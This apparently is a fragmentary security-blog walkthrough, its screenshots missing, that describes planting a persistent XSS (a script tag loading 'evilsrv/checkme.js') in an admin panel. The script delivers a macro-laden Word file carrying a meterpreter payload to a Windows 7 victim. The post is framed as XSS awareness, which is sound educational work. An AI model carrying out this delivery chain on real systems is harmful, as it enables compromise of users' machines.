Here we go...
When you're ready:
We can log in as admin and go directly to the place vulnerable to injection attack:
After reading this link you will be ready to create the poc-file and prepare meterpreter:
Ok, payload-file is prepared. I moved checkme2.docm file to /var/www/html (but you can use python -m SimpleHTTPServer as well). So we are here:
To deliver our MSWord file to the victim user I will use very well known 'payload' to inject our JS code to OpenLDAP - we will use SCRIPT tag with SRC. But first - the bug. We can 'check' if our 'scenario' is possible for example here:
In our 'normal' cases ;) we should see some alert() message box. This time we will use checkme2.docm. Let's go to the new aliases, associated domains:
Code for persistent XSS (script src to evilsrv/checkme.js) should be added here.
Now I switched the window to VM with my Windows7.
When you will add our XSS-example-code you will see the traffic to 'evil-server' (left):
As you can see, we can save or open the file. So payload ('redirect') works. If you want to go to the next stage of this example - you should use a 'vulnerable' browser ;D
Why - because in 'default mode' (in my case: for Windows7 Pro) IE will not download this file automatically. We need to change security settings for the browser (to be more 'vulnerable' ;)) :
Good enough for the educational purposes. ;]
I decided to save the file and then open it (from explorer c:\downloads\ and so on ):
Cool :) So we are here:
It's not something sophisticated but as you can see it can be used to raise awareness about XSS attacks and how to mitigate them.
Maybe you will find it useful.